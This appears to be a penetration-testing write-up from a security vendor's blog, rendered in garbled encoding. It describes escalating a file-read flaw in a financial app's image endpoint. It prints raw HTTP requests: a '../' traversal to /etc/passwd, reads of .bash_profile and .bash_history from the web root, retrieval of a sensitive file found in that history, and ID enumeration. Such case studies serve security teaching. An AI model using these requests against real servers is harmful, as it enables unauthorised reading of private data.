BevictorΰµÂ

֤ȯ¼ò³Æ£ºBevictorΰµÂ ֤ȯ´úÂ룺002212
È«Ììºò7x24Сʱ·þÎñ£º 400-777-0777

°¸Àý·ÖÏíØ­Ò»´ÎÎļþ¶ÁÈ¡Îó²îµÄ¡°Î£º¦Éý¼¶¡±Àú³Ì

ÔÚÊÚȨ²âÊÔij½ðÈÚÀàAPPʱ£¬·¢Ã÷Ò»¸ö¼¦ÀßµÍΣÎļþ¶ÁÈ¡Îó²î£¬ÊµÑ齫ÆäÉý¼¶Îª¸ßΣ ¡£·¢Ã÷Ê״η­¿ªAPPʱ£¬»áÏò·þÎñÆ÷¶ÁÈ¡Îļþ¼ÓÔØ²¢Õ¹Ê¾Í¼Æ¬ ¡£²âÊÔʱһ¶¨Òª×Ðϸ£¬±ÊÕß·¢Ã÷Ö»ÓÐÊ״η­¿ªAPPʱ£¬²Å»á¼ÓÔØÍ¼Æ¬£¬ºóÃæÔÙ·­¿ªÓ¦¸ÃÊÇ×ÊÔ´Òѱ»¼Í¼£¬¾Í²»»áÏò·þÎñÆ÷ÔٴξÙÐÐÇëÇóÁË ¡£

°¸Àý·ÖÏíØ­Ò»´ÎÎļþ¶ÁÈ¡Îó²îµÄ¡°Î£º¦Éý¼¶¡±Àú³Ì

Ðû²¼Ê±¼ä£º2022-11-04
ä¯ÀÀ´ÎÊý£º3429
·ÖÏí£º

ÔÚÊÚȨ²âÊÔij½ðÈÚÀàAPPʱ£¬·¢Ã÷Ò»¸ö¼¦ÀßµÍΣÎļþ¶ÁÈ¡Îó²î£¬ÊµÑ齫ÆäÉý¼¶Îª¸ßΣ ¡£

PS£º±¾ÎĽöÓÃÓÚÊÖÒÕÌÖÂÛÓëÆÊÎö£¬ÑϽûÓÃÓÚÈκβ»·¨ÓÃ;£¬Î¥ÕßЧ¹û×Ô×ð ¡£

0x00 ÆðԴ̽²â

·¢Ã÷Ê״η­¿ªAPPʱ£¬»áÏò·þÎñÆ÷¶ÁÈ¡Îļþ¼ÓÔØ²¢Õ¹Ê¾Í¼Æ¬ ¡£

²âÊÔʱһ¶¨Òª×Ðϸ£¬±ÊÕß·¢Ã÷Ö»ÓÐÊ״η­¿ªAPPʱ£¬²Å»á¼ÓÔØÍ¼Æ¬£¬ºóÃæÔÙ·­¿ªÓ¦¸ÃÊÇ×ÊÔ´Òѱ»¼Í¼£¬¾Í²»»áÏò·þÎñÆ÷ÔٴξÙÐÐÇëÇóÁË ¡£

´Ë¼ÓÔØÕ¹Ê¾Í¼Æ¬µÄGETÇëÇóÊý¾Ý°üÈçÏ£º

GET /ixxx/LgonImage.do?XxxxxImageDir=/XXXXX/Pictures&SaveXxxxxImageName=this_is_image.jpg HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

Äõ½Õâ¸öÊý¾Ý°üµÄµÚÒ»·´Ó¦£¬ÒÔÍùµÄÉøÍ¸²âÊÔÂÄÀú¸æËßÎÒ£¬´ÓÕâ¸öµØ·½»òÐí·»á±£´æÎļþ¶ÁÈ¡Îó²î ¡£

ÆÊÎö²¢ÍƲ⹦ЧµãURIµÄÿ¸ö²ÎÊýµÄ¹¦Ð§ ¡£

LogonImageDir=/XXXXX/Pictures - ͼƬËùÔÚµÄĿ¼

SaveXxxxxImageName=this_is_image.jpg - Ŀ¼ÏµÄͼƬÃû

0x01 Îó²î²âÊÔ

¼ÈÈ»ÒѾ­ÆðԴ̽²âµ½ÁË¿ÉÄܱ£´æÎó²îµÄΣº¦µã£¬²¢ÇÒÎļþ¶ÁÈ¡¹¦Ð§µÄ²ÎÊýÒѾ­¸ãÇåÎú£¬ÏÂÒ»²½¾ÍÕö¿ª¶ÁÈ¡²âÊÔ ¡£

Ê×ÏȲâÊÔ£¬ÊÇ·ñ¿ÉÒÔ¾ÙÐÐĿ¼Áгö£¬Ö±½Ó½«SaveXxxxxImageName²ÎÊýÖÿÕ£¬¿´¿´ÊÇ·ñ¿ÉÒÔ¶ÁÈ¡/XXXXX/PicturesĿ¼ÏµÄÄÚÈÝ£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures&SaveXxxxxImageName= HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

·µ»ØÎª¡°¿Õ¡±£¬Ê§°Ü£¬ËµÃ÷³ÌÐò¹¦Ð§µã²»±£´æÁгöĿ¼Îó²î£º

²âÊÔÊÇ·ñ¿ÉÒÔÌø³öĿ¼£¬Ñ¡ÓÃPayloadÈçÏ£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures/../../../../../../etc/&SaveXxxxxImageName=passwd HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

·µ»ØÄ³ºã·À»ðǽ×èµ²½çÃæ£¬Ê§°Ü£º

½ÓÏÂÀ´½øÒ»²½²âÊÔ£¬ÊÇ/etc/passwd´¥·¢µÄWAF£¬ÕÕ¾É/../´¥·¢µÄWAF ¡£

²âÊÔÖ»¾ÙÐÐÒ»²ãÄ¿Â¼Ìø³ö£¬²¢ÇÒɾ³ý/etc/passwdÒªº¦×Ö£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures/../&SaveXxxxxImageName= HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

ßí...¿´À´/../µÄÌØÊâ×Ö·û¾ÍÒѾ­´¥·¢ÁËWAF£º

Ö®ºóÏ뵽ʵÑé¶ÔÊý¾Ý°ü¾ÙÐÐPOSTÀàÐÍת»»£¬Ê¹ÓÃPOST´«²ÎµÄһЩ·½·¨¾ÙÐÐWAFµÄ²âÊÔ£¬È磺

URL±àÂë

·Ö¿é´«Êä

ÔàÊý¾ÝÌî³ä

°üÌåת»»

»ûÐÎÊý¾Ý°ü

......

¿ÉÊÇÎÞÄΣ¬POSTÇëÇóÖ±½ÓÎÞ·¨´«²Î£¬³ÌÐòÏÞÖÆÁËGETÇëÇóÎüÊÕ²ÎÊý ¡£

£¨²»¹ý£¬ØÊºó²âÊÔÆäËûPOST´«²ÎµÄ¹¦Ð§Ê±£¬·¢Ã÷ÒÔ±ÊÕßÏÖÓеÄWAFÈÆ¹ýÂÄÀú˼Ð÷£¬»ù´¡ÎÞ·¨¶ÔijºãµÄWAF¾ÙÐÐÈÆ¹ý.....£©

0x02 Îó²îÈ·ÈÏ

×ܽáÒÔÉ϶ԴËÎļþ¶ÁÈ¡Îó²îÍøÂçµ½µÄÐÅÏ¢£º

Ŀ¼ÎÞ·¨¿çÔ½£¬²¢ÇÒÎļþ¶ÁÈ¡µÄ·¾¶ÔÚÄ¿½ñ¸ùĿ¼  £»

ÌØÊâ×Ö·û´®£¬Òѱ»WAFÍêÉÆ·À»¤× ¡  £»

ÎÞ·¨»ñȡĿ¼ÏµÄÎļþÃû¡¢ÎÞ·¨Ô¤ÖªÊÇ·ñ¿ÉÒÔ¶ÁÈ¡ÆäËûºó׺Îļþ ¡£

²âÊÔµ½ÕâÀïͻȻÁé¹âÒ»ÉÁ£¬Ïëµ½ÁË¡°.bash_history¡±£¬ÈôÊÇÍøÕ¾¸ùĿ¼±£´æ´ËÎļþ£¬²¢ÇÒ¿ÉÒÔ¶ÁÈ¡£¬ÉÏÃæµÄÒÉÎʾͿÉÒÔÖ±½Ó½â¾öÌ©°ëÁË£¬ÏÈÀ´ÏàʶһÏÂÕâЩÎļþ×÷Óãº

.bash_profile£º´ËÎļþΪϵͳµÄÿ¸öÓû§ÉèÖÃÇéÐÎÐÅÏ¢£¬µ±Óû§µÚÒ»´ÎµÇ¼ʱ£¬¸ÃÎļþ±»Ö´ÐÐ ¡£

.bash_history£º¸ÃÎļþÉúÑÄÁËÄ¿½ñÓû§ÊäÈë¹ýµÄÀúÊ·ÏÂÁî  £»

.bash_logout£º¸ÃÎļþµÄÓÃ;ÊÇÓû§×¢ÏúʱִÐеÄÏÂÁĬÒÔΪ¿Õ  £»

.bashrc£º´ËÎļþΪÿһ¸öÔËÐÐbash shellµÄÓû§Ö´ÐдËÎļþ ¡£µ±bash shell±»·­¿ªÊ±£¬¸ÃÎļþ±»¶ÁÈ¡ ¡£

ÓÚÊÇÖ±½Ó¶ÔÍøÕ¾¸ùĿ¼¾ÙÐÐ.bash_profileµÄä²â£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/&SaveXxxxxImageName=.bash_profile HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

´Ëpayload¼È×èÖ¹ÁËÌø³öĿ¼£¬ÓֱܿªÁËWAFÑÏ´òµÄÌØÊâ×Ö·û£¬¿ÉÊÇΨһÒÅ©µÄ.bashÎļþ±»ÎÒÃÇʹÓõ½ÁË ¡£

¼¤¶¯µÄÐIJü¶¶µÄÊÖ£¬¿´À´Ä¿½ñÍøÕ¾¸ùĿ¼ȷʵÊÇ´ËÓû§µÄĿ¼£¬²¢ÇÒÓû§Ôڴ˸ùĿ¼ÏÂÖ´ÐйýÏÂÁ

½ÓÏÂÀ´ÊµÑé½øÒ»²½À©´óΣº¦ ¡£

0x03 Σº¦Éý¼¶

²»ÇåÎúÄ¿½ñĿ¼½á¹¹£¬¾Í´ú±í×ÅÎÞ·¨¶¨Ïò¶ÁÈ¡Îļþ£¬¿ÉÊÇÉÐÓÐÒ»¸ö.bash_historyÎÒÃÇûÓÐʹÓõ½£¬¿´¿´ÊÇ·ñ¿ÉÒÔÔÚÆäÖлñÈ¡µ½¸üÖ÷ÒªµÄÐÅÏ¢ ¡£

¶ÁÈ¡¸ùĿ¼ÏµÄ.bash_history£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/&SaveXxxxxImageName=.bash_history HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

ÐÅÏ¢Á¿ËäÈ»ÉÙ£¬¿ÉÊÇÒѾ­ÓÐÁËеÄÏ£Íû£º

ÓÉÀúÊ·ÏÂÁîµÃÖª£¬¹ÜÀíÔ±cd½øÈëÁËÁ½²ãĿ¼£º/Nxxxx/xxFile/

²¢ÇÒÉó²éÁËxx_20201022_51xxx.txtÎļþ ¡£

Ö±½Ó½á¹¹¶ÁÈ¡´ËÎļþ£¡

GET /ixxx/LogonImage.do?XxxxxImageDir=/Nxxxx/xxFile&SaveXxxxxImageName=xx_20201022_51xxx.txt HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

ÀֳɶÁÈ¡µ½ÁËÃô¸ÐµÄÊý¾ÝÐÅÏ¢£º

²¢ÇÒÎļþµÄIDֵΪʱ¼ä´Á+ID˳Ðò±àºÅ×é³É£¬¿ÉÇáËɱéÀú³öËùÓеÄÐÅÏ¢ ¡£

Burpsuite IntruderÄ£¿é²âÊÔ£º

ʵÑé±éÀú10¸öIDÖµÀÖ³É ¡£

0x04 »ØÊ××ܽá

±£´æµÄÄÑÌ⣺Ŀ¼ÎÞ·¨¿çÔ½¡¢WAF¶¢·À¡¢ÎÞ·¨Ô¤ÖªÄ¿Â¼Îļþ½á¹¹ ¡£

ÔÚ´ËÇéÐÎÏ£¬Ê¹ÓÃLinuxÎļþÏµÍ³ÌØÕ÷£¬ÈÔÈ»¿ÉÒÔ½«µÍΣÎó²îÌáÉýÖÁ¸ßΣ ¡£

²¢ÇÒΣº¦µÄÆ·¼¶Æéá«ÊÇÎÞ·¨Ô¤¹ÀµÄ£¬ÕâÈ¡¾öÓÚ.bash_history»á¸øÎÒÃÇй¶¼¸¶àÐÅÏ¢£¬ÒÔÊÇÎļþ¶ÁÈ¡Îó²î±£´æÊ±¼äÔ½¾Ã£¬¼Í¼µÄ¹¤¾ßÔ½¶à£¬Î£º¦Ô½´ó£¡

Òªº¦´Ê±êÇ©£º
ÍøÂçÇå¾² Îļþ¶ÁÈ¡Îó²î,
¿Í»§·þÎñÈÈÏß

400-777-0777
7*24Сʱ·þÎñ

ÁªÏµÓÊÏä

servicing@topsec.com.cn

ɨÂë¹Ø×¢
ÍøÕ¾µØÍ¼